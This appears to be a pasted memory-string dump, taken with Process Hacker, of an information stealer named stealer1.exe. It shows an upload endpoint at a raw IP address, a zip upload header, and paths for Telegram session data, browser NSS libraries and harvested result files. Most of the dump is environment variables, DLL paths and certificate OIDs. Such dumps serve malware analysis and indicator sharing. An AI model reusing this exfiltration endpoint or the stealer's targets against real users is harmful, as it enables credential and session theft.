Guest User

stealer2_28d213ccdf6f5856c12e928a372c1d56

a guest
Aug 15th, 2018
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 89.35 KB | None | 0 0
  1. http://141.105.71.82/Upload/
  2.  
  3. file; filename .zip
  4. Content-Type: application/octet-stream
  5.  
  6. id f9686f36-49cc-4f37-b2a9-b3b0572473cb (original af3c4c9f-8ea3-413f-af4b-5700ee9157bc)
  7.  
  8. f9686f36-49cc-4f37-b2a9-b3b0572473cb
  9. af3c4c9f-8ea3-413f-af4b-5700ee9157bc
  10.  
  11.  
  12. Process Hacker 2.39.124
  13. Windows NT 6.1 Service Pack 1 (64-bit)
  14. 8/15/2018 7:26:16 AM
  15.  
  16. 0x15b8fc (58): C:\Users\A\AppData\Local\Temp
  17. 0x15bbec (41): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
  18. 0x163444 (82): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
  19. 0x163c10 (41): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
  20. 0x16ac30 (84): C:\Users\A\AppData\Local\Temp\MSVCP140.dll
  21. 0x16b044 (24): MSVCP140.dll
  22. 0x16b0ea (22): RtlInitializeSListHead
  23. 0x16b370 (22): mozglue.dll
  24. 0x16b898 (30): C:\Users\A\AppData\Local\Temp\
  25. 0x16bc96 (62): 8C:\Users\A\AppData\Local\Temp\
  26. 0x16bec0 (36): C:\Users\A\AppData\Local\Temp\32.zip
  27. 0x16c2ce (62): 6C:\Users\A\AppData\Local\Temp\
  28. 0x16c4d8 (40): C:\Users\A\AppData\Local\Temp\result.txt
  29. 0x16ccf0 (44): C:\Program Files (x86)
  30. 0x16cef8 (29): C:tdata\D877F783D5D3EF8C\map0
  31. 0x16d308 (25): C:tdata\D877F783D5D3EF8C0
  32. 0x16d718 (29): C:tdata\D877F783D5D3EF8C\map1
  33. 0x16db28 (25): C:tdata\D877F783D5D3EF8C1
  34. 0x16db64 (138): \Registry\Machine\System\CurrentControlSet\Control\Nls\ExtendedLocale
  35. 0x16df10 (148): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.EN.DLL
  36. 0x16e208 (148): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.EN.DLL
  37. 0x16e338 (60): C:\Users\A\AppData\Local\Temp\
  38. 0x16e5f0 (98): C:\Program Files (x86)\IEInspector\HTTPAnalyzerF>
  39. 0x16e748 (60): C:\Users\A\AppData\Local\Temp\
  40. 0x16e950 (24): C:\Users\A\AppData\Local
  41. 0x16ea58 (19): 2018-08-15 07-22-39
  42. 0x16ebe8 (34): C:\Users\A\AppData\Local\Temp\.zip
  43. 0x16efe0 (144): C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-core-localization-
  44. 0x16f128 (20): C:\Users\A\Documents
  45. 0x16f230 (26): C:\Users\A\AppData\Roaming
  46. 0x16f338 (18): C:\Users\A\Desktop
  47. 0x16f3ec (66): api-ms-win-core-localization-l1-G
  48. 0x16f568 (30): C:\Users\A\AppData\Local\Temp\
  49. 0x16fba4 (12): PQRSTUVWXYZ[
  50. 0x16fcd8 (104): \Device\HarddiskVolume2\Users\A\Desktop\stealer1.exe
  51. 0x24ca78 (12): 3++S++
  52. 0x24d078 (12): 3++S++
  53. 0x24dcb0 (24): \KnownDlls32
  54. 0x24dcca (16): glue.dll
  55. 0x24e4b0 (16): Harddisk
  56. 0x24e4c8 (16): me2\Wind
  57. 0x24e676 (16): USERDA~1
  58. 0x24e68e (18): User Data
  59. 0x24e790 (16): \Session
  60. 0x24e7c0 (24): \Sessionvv1\
  61. 0x24e7e0 (130): \??\C:\Windows\SysWOW64\WindowsPowerShell\v1.0\MSVCP140.dlllC:\W\
  62. 0x24ece0 (58): C:\Windows\syswow64\ntdll.dll
  63. 0x24eea2 (15): Wow64ApcRoutine
  64. 0x24eeb2 (8): xception
  65. 0x24f1c0 (58): C:\Windows\SYSTEM32\wow64.dll
  66. 0x281320 (14): =::=::\
  67. 0x281330 (60): ALLUSERSPROFILE=C:\ProgramData
  68. 0x28136e (68): APPDATA=C:\Users\A\AppData\Roaming
  69. 0x2813b4 (96): CommonProgramFiles=C:\Program Files\Common Files
  70. 0x281416 (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
  71. 0x28148e (96): CommonProgramW6432=C:\Program Files\Common Files
  72. 0x2814f0 (28): COMPUTERNAME=O
  73. 0x28150e (70): ComSpec=C:\Windows\system32\cmd.exe
  74. 0x281556 (38): FP_NO_HOST_CHECK=NO
  75. 0x28157e (24): HOMEDRIVE=C:
  76. 0x281598 (34): HOMEPATH=\Users\A
  77. 0x2815bc (74): LOCALAPPDATA=C:\Users\A\AppData\Local
  78. 0x281608 (30): LOGONSERVER=\\O
  79. 0x281628 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
  80. 0x2816b4 (72): MpConfig_ProductCodeName=AntiSpyware
  81. 0x2816fe (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
  82. 0x28176c (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
  83. 0x281814 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
  84. 0x28188c (44): NUMBER_OF_PROCESSORS=4
  85. 0x2818ba (26): OS=Windows_NT
  86. 0x2818d6 (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  87. 0x281a1a (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  88. 0x281a96 (56): PROCESSOR_ARCHITECTURE=AMD64
  89. 0x281ad0 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
  90. 0x281b62 (34): PROCESSOR_LEVEL=6
  91. 0x281b86 (46): PROCESSOR_REVISION=9e09
  92. 0x281bb6 (52): ProgramData=C:\ProgramData
  93. 0x281bec (58): ProgramFiles=C:\Program Files
  94. 0x281c28 (80): ProgramFiles(x86)=C:\Program Files (x86)
  95. 0x281c7a (58): ProgramW6432=C:\Program Files
  96. 0x281cb6 (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  97. 0x281d38 (44): PUBLIC=C:\Users\Public
  98. 0x281d66 (38): SESSIONNAME=Console
  99. 0x281d8e (28): SystemDrive=C:
  100. 0x281dac (42): SystemRoot=C:\Windows
  101. 0x281dd8 (68): TEMP=C:\Users\A\AppData\Local\Temp
  102. 0x281e1e (66): TMP=C:\Users\A\AppData\Local\Temp
  103. 0x281e62 (24): USERDOMAIN=O
  104. 0x281e7c (20): USERNAME=A
  105. 0x281e92 (44): USERPROFILE=C:\Users\A
  106. 0x281ec0 (34): windir=C:\Windows
  107. 0x281ee4 (46): windows_tracing_flags=3
  108. 0x281f14 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
  109. 0x2823b0 (38): C:\Users\A\Desktop\
  110. 0x2825b8 (454): C:\Users\A\Desktop;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  111. 0x282780 (62): C:\Users\A\Desktop\stealer1.exe
  112. 0x2827c0 (68): "C:\Users\A\Desktop\stealer1.exe"
  113. 0x282806 (62): C:\Users\A\Desktop\stealer1.exe
  114. 0x282846 (30): Winsta0\Default
  115. 0x282870 (58): C:\Windows\SYSTEM32\ntdll.dll
  116. 0x2828c0 (38): C:\Windows\system32
  117. 0x282900 (38): C:\Windows\SYSTEM32
  118. 0x282b38 (22): C:\Windows\
  119. 0x282d6c (14): \SYSTEN
  120. 0x282d9c (14): TEM32\O
  121. 0x282dd0 (64): C:\Windows\SYSTEM32\wow64win.dll
  122. 0x282f80 (58): C:\Windows\SYSTEM32\wow64.dll
  123. 0x2830dc (14): TEM32\N
  124. 0x28313c (14): 2\wow6H
  125. 0x283150 (66): \Sessions\1\Windows\ApiPortection
  126. 0x2831b0 (30): stemFunction035
  127. 0x2831d0 (16): rogresst
  128. 0x2831e4 (12): ip.dll
  129. 0x283340 (64): C:\Windows\SYSTEM32\wow64cpu.dll
  130. 0x2834a0 (214): \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST
  131. 0x283580 (20): figuration
  132. 0x283596 (16): Folders
  133. 0x283cb8 (238): \Registry\Machine\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST
  134. 0x330800 (60): ALLUSERSPROFILE=C:\ProgramData
  135. 0x33083e (68): APPDATA=C:\Users\A\AppData\Roaming
  136. 0x330884 (108): CommonProgramFiles=C:\Program Files (x86)\Common Files
  137. 0x3308f2 (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
  138. 0x33096a (96): CommonProgramW6432=C:\Program Files\Common Files
  139. 0x3309cc (28): COMPUTERNAME=O
  140. 0x3309ea (70): ComSpec=C:\Windows\system32\cmd.exe
  141. 0x330a32 (38): FP_NO_HOST_CHECK=NO
  142. 0x330a5a (24): HOMEDRIVE=C:
  143. 0x330a74 (34): HOMEPATH=\Users\A
  144. 0x330a98 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
  145. 0x330ae4 (30): LOGONSERVER=\\O
  146. 0x330b04 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
  147. 0x330b90 (72): MpConfig_ProductCodeName=AntiSpyware
  148. 0x330bda (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
  149. 0x330c48 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
  150. 0x330cf0 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
  151. 0x330d68 (44): NUMBER_OF_PROCESSORS=4
  152. 0x330d96 (26): OS=Windows_NT
  153. 0x330db2 (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  154. 0x330ef6 (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  155. 0x330f72 (52): PROCESSOR_ARCHITECTURE=x86
  156. 0x330fa8 (56): PROCESSOR_ARCHITEW6432=AMD64
  157. 0x330fe2 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
  158. 0x331074 (34): PROCESSOR_LEVEL=6
  159. 0x331098 (46): PROCESSOR_REVISION=9e09
  160. 0x3310c8 (52): ProgramData=C:\ProgramData
  161. 0x3310fe (70): ProgramFiles=C:\Program Files (x86)
  162. 0x331146 (80): ProgramFiles(x86)=C:\Program Files (x86)
  163. 0x331198 (58): ProgramW6432=C:\Program Files
  164. 0x3311d4 (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  165. 0x331256 (44): PUBLIC=C:\Users\Public
  166. 0x331284 (38): SESSIONNAME=Console
  167. 0x3312ac (28): SystemDrive=C:
  168. 0x3312ca (42): SystemRoot=C:\Windows
  169. 0x3312f6 (68): TEMP=C:\Users\A\AppData\Local\Temp
  170. 0x33133c (66): TMP=C:\Users\A\AppData\Local\Temp
  171. 0x331380 (24): USERDOMAIN=O
  172. 0x33139a (20): USERNAME=A
  173. 0x3313b0 (44): USERPROFILE=C:\Users\A
  174. 0x3313de (34): windir=C:\Windows
  175. 0x331402 (46): windows_tracing_flags=3
  176. 0x331432 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
  177. 0x331502 (14): h>@0DFp
  178. 0x331760 (38): C:\Users\A\Desktop\
  179. 0x331968 (454): C:\Users\A\Desktop;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  180. 0x331b30 (62): C:\Users\A\Desktop\stealer1.exe
  181. 0x331b70 (68): "C:\Users\A\Desktop\stealer1.exe"
  182. 0x331bb6 (62): C:\Users\A\Desktop\stealer1.exe
  183. 0x331bf6 (30): Winsta0\Default
  184. 0x331c18 (14): =::=::\
  185. 0x331c28 (60): ALLUSERSPROFILE=C:\ProgramData
  186. 0x331c66 (68): APPDATA=C:\Users\A\AppData\Roaming
  187. 0x331cac (96): CommonProgramFiles=C:\Program Files\Common Files
  188. 0x331d0e (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
  189. 0x331d86 (96): CommonProgramW6432=C:\Program Files\Common Files
  190. 0x331de8 (28): COMPUTERNAME=O
  191. 0x331e06 (70): ComSpec=C:\Windows\system32\cmd.exe
  192. 0x331e4e (38): FP_NO_HOST_CHECK=NO
  193. 0x331e76 (24): HOMEDRIVE=C:
  194. 0x331e90 (34): HOMEPATH=\Users\A
  195. 0x331eb4 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
  196. 0x331f00 (30): LOGONSERVER=\\O
  197. 0x331f20 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
  198. 0x331fac (72): MpConfig_ProductCodeName=AntiSpyware
  199. 0x331ff6 (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
  200. 0x332064 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
  201. 0x33210c (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
  202. 0x332184 (44): NUMBER_OF_PROCESSORS=4
  203. 0x3321b2 (26): OS=Windows_NT
  204. 0x3321ce (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  205. 0x332312 (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  206. 0x33238e (56): PROCESSOR_ARCHITECTURE=AMD64
  207. 0x3323c8 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
  208. 0x33245a (34): PROCESSOR_LEVEL=6
  209. 0x33247e (46): PROCESSOR_REVISION=9e09
  210. 0x3324ae (52): ProgramData=C:\ProgramData
  211. 0x3324e4 (58): ProgramFiles=C:\Program Files
  212. 0x332520 (80): ProgramFiles(x86)=C:\Program Files (x86)
  213. 0x332572 (58): ProgramW6432=C:\Program Files
  214. 0x3325ae (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  215. 0x332630 (44): PUBLIC=C:\Users\Public
  216. 0x33265e (38): SESSIONNAME=Console
  217. 0x332686 (28): SystemDrive=C:
  218. 0x3326a4 (42): SystemRoot=C:\Windows
  219. 0x3326d0 (68): TEMP=C:\Users\A\AppData\Local\Temp
  220. 0x332716 (66): TMP=C:\Users\A\AppData\Local\Temp
  221. 0x33275a (24): USERDOMAIN=O
  222. 0x332774 (20): USERNAME=A
  223. 0x33278a (44): USERPROFILE=C:\Users\A
  224. 0x3327b8 (34): windir=C:\Windows
  225. 0x3327dc (46): windows_tracing_flags=3
  226. 0x33280c (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
  227. 0x3328a8 (40): C:\Windows\SYSTEM32\
  228. 0x3328d2 (24): ROCESSOR_IDJ
  229. 0x3328f0 (38): C:\Windows\syswow64
  230. 0x332a28 (58): C:\Windows\SysWOW64\ntdll.dll
  231. 0x332a90 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
  232. 0x332c98 (64): C:\Windows\syswow64\kernel32.dll
  233. 0x332d80 (68): C:\Windows\syswow64\KERNELBASE.dll
  234. 0x332e7f (35):
  235. "C:\Users\A\Desktop\stealer1.exe"
  236. 0x332eb0 (98): C:\Windows\system32;C:\Windows\system;C:\Windows;
  237. 0x3334a8 (60): C:\Windows\syswow64\USER32.dll
  238. 0x333588 (58): C:\Windows\syswow64\GDI32.dll
  239. 0x3336b0 (54): C:\Windows\syswow64\LPK.dll
  240. 0x3337e8 (58): C:\Windows\syswow64\USP10.dll
  241. 0x3338b0 (60): C:\Windows\syswow64\msvcrt.dll
  242. 0x337870 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
  243. 0x337942 (14): Q!1AQaq
  244. 0x355710 (64): C:\Windows\syswow64\ADVAPI32.dll
  245. 0x3557e0 (60): C:\Windows\syswow64\RPCRT4.dll
  246. 0x3558a8 (62): C:\Windows\syswow64\SspiCli.dll
  247. 0x355970 (66): C:\Windows\syswow64\CRYPTBASE.dll
  248. 0x3559c0 (62): C:\Windows\syswow64\SHELL32.dll
  249. 0x355a08 (62): C:\Windows\SysWOW64\sechost.dll
  250. 0x355bd0 (62): C:\Windows\syswow64\SHLWAPI.dll
  251. 0x356098 (62): C:\Windows\syswow64\CRYPT32.dll
  252. 0x356160 (60): C:\Windows\syswow64\MSASN1.dll
  253. 0x3568e0 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
  254. 0x357368 (12): PR((*P
  255. 0x3573e0 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
  256. 0x3581a8 (60): C:\Windows\syswow64\WS2_32.dll
  257. 0x3581f0 (54): C:\Windows\syswow64\NSI.dll
  258. 0x358230 (62): C:\Windows\syswow64\WLDAP32.dll
  259. 0x358278 (64): C:\Windows\syswow64\Normaliz.dll
  260. 0x3589fe (124): 3system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\SystH
  261. 0x358ac6 (458): 6ilC:\Users\A\Desktop;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  262. 0x358cce (14): 5ft\Win
  263. 0x359546 (28): windir=C:\Wink
  264. 0x3595ac (120): racing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
  265. 0x359706 (7): \-`([Y%
  266. 0x35976c (7): }yaIpA
  267.  
  268. 0x359e98 (58): C:\Windows\syswow64\MSCTF.dll
  269. 0x35a0c0 (58): C:\Windows\system32\IMM32.DLL
  270. 0x35b6ff (8): vDEFAULT
  271. 0x35b727 (8): v2.5.4.3
  272. 0x35b74f (8): v2.5.4.4
  273. 0x35b777 (8): v2.5.4.5
  274. 0x35b79f (8): v2.5.4.6
  275. 0x35b7c7 (8): v2.5.4.7
  276. 0x35b7ef (8): v2.5.4.8
  277. 0x35b817 (8): v2.5.4.9
  278. 0x35bd90 (27): CryptSIPDllPutSignedDataMsg
  279. 0x35bde0 (27): CryptSIPDllGetSignedDataMsg
  280. 0x35be30 (30): CryptSIPDllRemoveSignedDataMsg
  281. 0x35be80 (29): CryptSIPDllCreateIndirectData
  282. 0x35bed0 (29): CryptSIPDllVerifyIndirectData
  283. 0x35bf38 (23): CryptSIPDllIsMyFileType
  284. 0x35bf80 (23): CertDllVerifyRevocation
  285. 0x35bfc8 (21): CertDllVerifyCTLUsage
  286. 0x35c010 (20): CryptDllFormatObject
  287. 0x35c058 (22): CertDllEnumSystemStore
  288. 0x35c0a0 (20): CertDllOpenStoreProv
  289. 0x35c0e8 (20): CryptCNGPKCS12GetMap
  290. 0x35c130 (16): CryptCNGInitHMAC
  291. 0x35c178 (20): CryptDllEncodeObject
  292. 0x35c1c0 (20): CryptDllDecodeObject
  293. 0x35c208 (22): CryptDllEncodeObjectEx
  294. 0x35c250 (22): CryptDllDecodeObjectEx
  295. 0x35c2b8 (58): C:\Windows\syswow64\ole32.dll
  296. 0x35c300 (62): C:\Windows\system32\version.dll
  297. 0x35c348 (62): C:\Windows\system32\wsock32.dll
  298. 0x35c390 (62): C:\Users\A\Desktop\stealer1.exe
  299. 0x35c440 (22): NUMBER_OF_PROCESSORS=4
  300. 0x35c488 (26): PROCESSOR_ARCHITECTURE=x86
  301. 0x35c4d0 (23): PROCESSOR_REVISION=9e09
  302. 0x35c518 (26): ProgramData=C:\ProgramData
  303. 0x35c560 (22): PUBLIC=C:\Users\Public
  304. 0x35c5a8 (21): SystemRoot=C:\Windows
  305. 0x35c5f0 (22): USERPROFILE=C:\Users\A
  306. 0x35c638 (23): windows_tracing_flags=3
  307. 0x35c6a8 (52): C:\Users\A\AppData\Roaming
  308. 0x35c6f0 (48): C:\Users\A\AppData\Local
  309. 0x35c7c8 (62): C:\Windows\system32\secur32.dll
  310. 0x35c8a0 (62): C:\Windows\system32\mswsock.dll
  311. 0x35c8e8 (60): C:\Windows\System32\wship6.dll
  312. 0x35c9c0 (60): C:\Windows\system32\DNSAPI.dll
  313. 0x35ca08 (60): C:\Windows\system32\WINNSI.DLL
  314. 0x35cc00 (60): C:\Windows\system32\ncrypt.dll
  315. 0x35cc90 (56): Microsoft Package Negotiator
  316. 0x35ccd8 (58): NegoExtender Security Package
  317. 0x35cd20 (60): C:\Windows\SysWOW64\msv1_0.DLL
  318. 0x35cd68 (58): C:\Windows\SysWOW64\TsPkg.DLL
  319. 0x35cdb0 (58): C:\Windows\SysWOW64\pku2u.DLL
  320. 0x35cdf8 (62): C:\Windows\system32\credssp.dll
  321. 0x35ce40 (62): C:\Windows\system32\credssp.dll
  322. 0x35ce88 (60): C:\Windows\system32\bcrypt.dll
  323. 0x35cf20 (24): CryptSIPDllIsMyFileType2
  324. 0x35cf70 (29): CryptDllExportPublicKeyInfoEx
  325. 0x35cfc0 (29): CryptDllImportPublicKeyInfoEx
  326. 0x35d010 (36): CryptDllEncodePublicKeyAndParameters
  327. 0x35d068 (28): CryptDllConvertPublicKeyInfo
  328. 0x35d0a7 (21): v1.2.840.113549.1.1.1
  329. 0x35d0df (14): v1.3.14.3.2.22
  330. 0x35d10f (14): v1.3.14.3.2.12
  331. 0x35d13f (18): v1.2.840.10040.4.1
  332. 0x35d177 (18): v1.2.840.10046.2.1
  333. 0x35d1af (21): v1.2.840.113549.1.3.1
  334. 0x35d1e7 (21): v1.2.840.113549.1.1.1
  335. 0x35d21f (14): v1.3.14.3.2.22
  336. 0x35d24f (14): v1.3.14.3.2.12
  337. 0x35d27f (18): v1.2.840.10040.4.1
  338. 0x35d2c8 (41): CryptDllExtractEncodedSignatureParameters
  339. 0x35d328 (25): CryptDllSignAndEncodeHash
  340. 0x35d378 (30): CryptDllVerifyEncodedSignature
  341. 0x35d3e0 (30): CryptDllImportPublicKeyInfoEx2
  342. 0x35d430 (30): CryptDllExportPublicKeyInfoEx2
  343. 0x35d480 (26): CertDllOpenSystemStoreProv
  344. 0x35d4d0 (26): CertDllRegisterSystemStore
  345. 0x35d520 (28): CertDllUnregisterSystemStore
  346. 0x35d570 (28): CertDllRegisterPhysicalStore
  347. 0x35d5c0 (30): CertDllUnregisterPhysicalStore
  348. 0x35d610 (24): CertDllEnumPhysicalStore
  349. 0x35d660 (30): CryptDllExportPrivateKeyInfoEx
  350. 0x35d6b0 (30): CryptDllImportPrivateKeyInfoEx
  351. 0x35d700 (28): CryptMsgDllCNGExportKeyTrans
  352. 0x35d750 (28): CryptMsgDllCNGExportKeyAgree
  353. 0x35d7a0 (28): CryptMsgDllCNGImportKeyTrans
  354. 0x35d7f0 (28): CryptMsgDllCNGImportKeyAgree
  355. 0x35d840 (24): CryptMsgDllGenEncryptKey
  356. 0x35d890 (27): CryptMsgDllExportEncryptKey
  357. 0x35d8e0 (27): CryptMsgDllImportEncryptKey
  358. 0x35d930 (31): CryptMsgDllGenContentEncryptKey
  359. 0x35d980 (25): CryptMsgDllExportKeyTrans
  360. 0x35d9d0 (25): CryptMsgDllExportKeyAgree
  361. 0x35da20 (25): CryptMsgDllExportMailList
  362. 0x35da70 (25): CryptMsgDllImportKeyTrans
  363. 0x35dac0 (25): CryptMsgDllImportKeyAgree
  364. 0x35db10 (25): CryptMsgDllImportMailList
  365. 0x35db38 (64): C:\Windows\syswow64\oleaut32.dll
  366. 0x35dce8 (30): ALLUSERSPROFILE=C:\ProgramData
  367. 0x35dd38 (34): APPDATA=C:\Users\A\AppData\Roaming
  368. 0x35dd88 (35): ComSpec=C:\Windows\system32\cmd.exe
  369. 0x35ddd8 (28): PROCESSOR_ARCHITEW6432=AMD64
  370. 0x35de28 (35): ProgramFiles=C:\Program Files (x86)
  371. 0x35de78 (29): ProgramW6432=C:\Program Files
  372. 0x35dec8 (34): TEMP=C:\Users\A\AppData\Local\Temp
  373. 0x35df18 (33): TMP=C:\Users\A\AppData\Local\Temp
  374. 0x35df98 (64): C:\Windows\System32\wshtcpip.dll
  375. 0x35dfe8 (64): C:\Windows\system32\IPHLPAPI.DLL
  376. 0x35e0d8 (64): C:\Windows\system32\rasadhlp.dll
  377. 0x35e128 (64): C:\Windows\System32\fwpuclnt.dll
  378. 0x35e198 (29): ProgramW6432=C:\Program Files
  379. 0x35e1e8 (35): ProgramFiles=C:\Program Files (x86)
  380. 0x35e238 (34): APPDATA=C:\Users\A\AppData\Roaming
  381. 0x35e288 (28): PROCESSOR_ARCHITEW6432=AMD64
  382. 0x35e2d8 (35): ComSpec=C:\Windows\system32\cmd.exe
  383. 0x35e328 (30): ALLUSERSPROFILE=C:\ProgramData
  384. 0x35e3c8 (46): CryptDllExportPublicKeyInfoFromBCryptKeyHandle
  385. 0x35e417 (9): v2.5.4.10
  386. 0x35e447 (9): v2.5.4.11
  387. 0x35e477 (9): v2.5.4.12
  388. 0x35e4a7 (9): v2.5.4.13
  389. 0x35e4d7 (9): v2.5.4.14
  390. 0x35e507 (9): v2.5.4.15
  391. 0x35e537 (9): v2.5.4.16
  392. 0x35e567 (9): v2.5.4.17
  393. 0x35e597 (9): v2.5.4.18
  394. 0x35e5c7 (9): v2.5.4.19
  395. 0x35e60f (9): v2.5.4.20
  396. 0x35e63f (9): v2.5.4.21
  397. 0x35e66f (9): v2.5.4.22
  398. 0x35e69f (9): v2.5.4.23
  399. 0x35e6cf (9): v2.5.4.24
  400. 0x35e6ff (9): v2.5.4.25
  401. 0x35e72f (9): v2.5.4.26
  402. 0x35e75f (9): v2.5.4.27
  403. 0x35e78f (9): v2.5.4.28
  404. 0x35e7bf (9): v2.5.4.29
  405. 0x35e7ef (9): v2.5.4.30
  406. 0x35e81f (9): v2.5.4.31
  407. 0x35e84f (9): v2.5.4.32
  408. 0x35e87f (9): v2.5.4.33
  409. 0x35e8af (9): v2.5.4.34
  410. 0x35e8df (9): v2.5.4.35
  411. 0x35e90f (9): v2.5.4.36
  412. 0x35e93f (9): v2.5.4.37
  413. 0x35e96f (9): v2.5.4.38
  414. 0x35e99f (9): v2.5.4.39
  415. 0x35e9cf (9): v2.5.4.40
  416. 0x35e9ff (9): v2.5.4.42
  417. 0x35ea2f (9): v2.5.4.43
  418. 0x35ea5f (10): v2.5.29.19
  419. 0x35ea8f (10): v2.5.29.10
  420. 0x35eabf (10): v2.5.29.21
  421. 0x35eaef (10): v2.5.29.37
  422. 0x35eb1f (9): v2.5.29.7
  423. 0x35eb4f (9): v2.5.29.8
  424. 0x35eb7f (10): v2.5.29.17
  425. 0x35ebaf (10): v2.5.29.18
  426. 0x35ebdf (9): v2.5.29.1
  427. 0x35ec0f (10): v2.5.29.35
  428. 0x35ec3f (10): v2.5.29.14
  429. 0x35ec6f (10): v2.5.29.15
  430. 0x35ec9f (9): v2.5.29.2
  431. 0x35eccf (9): v2.5.29.4
  432. 0x35ecff (10): v2.5.29.31
  433. 0x35ed2f (10): v2.5.29.46
  434. 0x35ed5f (10): v2.5.29.32
  435. 0x35ed8f (10): v2.5.29.20
  436. 0x35edbf (10): v2.5.29.27
  437. 0x35edf7 (27): v0.9.2342.19200300.100.1.25
  438. 0x35ee37 (22): v1.2.840.113549.1.9.20
  439. 0x35ee6f (22): v1.2.840.113549.1.9.21
  440. 0x35eea7 (21): v1.3.6.1.4.1.311.10.2
  441. 0x35eedf (23): v1.3.6.1.4.1.311.2.1.27
  442. 0x35ef17 (22): v1.2.840.113549.1.9.15
  443. 0x35ef4f (18): v1.3.6.1.5.5.7.1.1
  444. 0x35ef87 (19): v1.3.6.1.5.5.7.1.11
  445. 0x35efbf (21): v1.3.6.1.4.1.311.20.2
  446. 0x35efff (23): v1.3.6.1.4.1.311.13.2.3
  447. 0x35f04f (22): v2.16.840.1.113730.1.1
  448. 0x35f087 (22): v2.16.840.1.113730.1.2
  449. 0x35f0bf (22): v2.16.840.1.113730.1.3
  450. 0x35f0f7 (22): v2.16.840.1.113730.1.4
  451. 0x35f12f (22): v2.16.840.1.113730.1.7
  452. 0x35f167 (22): v2.16.840.1.113730.1.8
  453. 0x35f19f (23): v2.16.840.1.113730.1.12
  454. 0x35f1d7 (23): v2.16.840.1.113730.1.13
  455. 0x35f20f (23): v1.3.6.1.4.1.311.13.2.1
  456. 0x35f247 (21): v1.3.6.1.4.1.311.21.1
  457. 0x35f27f (23): v1.3.6.1.4.1.311.2.1.10
  458. 0x35f2b7 (21): v1.3.6.1.4.1.311.21.3
  459. 0x35f2ef (21): v1.3.6.1.4.1.311.21.4
  460. 0x35f327 (21): v1.3.6.1.4.1.311.21.2
  461. 0x35f35f (22): v1.3.6.1.4.1.311.21.10
